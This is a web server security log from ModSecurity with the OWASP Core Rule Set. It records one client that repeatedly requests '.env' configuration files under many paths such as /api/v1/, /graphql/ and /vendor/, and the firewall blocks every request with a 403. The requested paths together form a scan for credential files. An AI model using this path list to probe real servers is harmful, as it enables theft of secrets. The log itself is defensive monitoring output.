[Mon May 11 18:07:06.670746 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/v2/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd6AAAAAo"]
[Mon May 11 18:07:06.671023 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qg-Qm4vhlWBPlMjd6AAAAAo"]
[Mon May 11 18:07:06.953232 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/v3/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd6QAAAAo"]
[Mon May 11 18:07:06.953455 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/v3/.env"] [unique_id "agH-qg-Qm4vhlWBPlMjd6QAAAAo"]
[Mon May 11 18:07:06.953738 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qg-Qm4vhlWBPlMjd6QAAAAo"]
[Mon May 11 18:07:07.207432 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/v1/.env"] [unique_id "agH-qw-Qm4vhlWBPlMjd6gAAAAo"]
[Mon May 11 18:07:07.207668 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/v1/.env"] [unique_id "agH-qw-Qm4vhlWBPlMjd6gAAAAo"]
[Mon May 11 18:07:07.207992 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qw-Qm4vhlWBPlMjd6gAAAAo"]
[Mon May 11 18:07:07.697788 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/v2/.env"] [unique_id "agH-qw-Qm4vhlWBPlMjd7AAAAAo"]
[Mon May 11 18:07:07.698021 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/v2/.env"] [unique_id "agH-qw-Qm4vhlWBPlMjd7AAAAAo"]
[Mon May 11 18:07:07.698316 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-qw-Qm4vhlWBPlMjd7AAAAAo"]
[Mon May 11 18:07:08.076816 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/rest/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd7gAAAAo"]
[Mon May 11 18:07:08.077025 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/rest/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd7gAAAAo"]
[Mon May 11 18:07:08.077333 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rA-Qm4vhlWBPlMjd7gAAAAo"]
[Mon May 11 18:07:08.345376 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/graphql/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd7wAAAAo"]
[Mon May 11 18:07:08.345606 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/graphql/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd7wAAAAo"]
[Mon May 11 18:07:08.345880 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rA-Qm4vhlWBPlMjd7wAAAAo"]
[Mon May 11 18:07:08.610705 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/gateway/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd8AAAAAo"]
[Mon May 11 18:07:08.610939 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/gateway/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd8AAAAAo"]
[Mon May 11 18:07:08.611257 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rA-Qm4vhlWBPlMjd8AAAAAo"]
[Mon May 11 18:07:08.964910 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/microservice/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd8QAAAAo"]
[Mon May 11 18:07:08.965166 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/microservice/.env"] [unique_id "agH-rA-Qm4vhlWBPlMjd8QAAAAo"]
[Mon May 11 18:07:08.966802 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rA-Qm4vhlWBPlMjd8QAAAAo"]
[Mon May 11 18:07:09.263684 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/service/.env"] [unique_id "agH-rQ-Qm4vhlWBPlMjd8wAAAAo"]
[Mon May 11 18:07:09.263963 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/service/.env"] [unique_id "agH-rQ-Qm4vhlWBPlMjd8wAAAAo"]
[Mon May 11 18:07:09.264337 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rQ-Qm4vhlWBPlMjd8wAAAAo"]
[Mon May 11 18:07:09.651443 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/v3/.env"] [unique_id "agH-rQ-Qm4vhlWBPlMjd9AAAAAo"]
[Mon May 11 18:07:09.651677 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/v3/.env"] [unique_id "agH-rQ-Qm4vhlWBPlMjd9AAAAAo"]
[Mon May 11 18:07:09.653118 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rQ-Qm4vhlWBPlMjd9AAAAAo"]
[Mon May 11 18:07:09.926405 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/dev/.env"] [unique_id "agH-rQ-Qm4vhlWBPlMjd9QAAAAo"]
[Mon May 11 18:07:09.926638 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/dev/.env"] [unique_id "agH-rQ-Qm4vhlWBPlMjd9QAAAAo"]
[Mon May 11 18:07:09.926916 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rQ-Qm4vhlWBPlMjd9QAAAAo"]
[Mon May 11 18:07:10.324270 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/api/staging/.env"] [unique_id "agH-rg-Qm4vhlWBPlMjd9wAAAAo"]
[Mon May 11 18:07:10.324502 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/api/staging/.env"] [unique_id "agH-rg-Qm4vhlWBPlMjd9wAAAAo"]
[Mon May 11 18:07:10.324784 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rg-Qm4vhlWBPlMjd9wAAAAo"]
[Mon May 11 18:07:10.657585 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/vendor/.env"] [unique_id "agH-rg-Qm4vhlWBPlMjd-QAAAAo"]
[Mon May 11 18:07:10.657834 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/vendor/.env"] [unique_id "agH-rg-Qm4vhlWBPlMjd-QAAAAo"]
[Mon May 11 18:07:10.658208 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rg-Qm4vhlWBPlMjd-QAAAAo"]
[Mon May 11 18:07:11.106777 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/lib/.env"] [unique_id "agH-rw-Qm4vhlWBPlMjd-gAAAAo"]
[Mon May 11 18:07:11.107103 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/lib/.env"] [unique_id "agH-rw-Qm4vhlWBPlMjd-gAAAAo"]
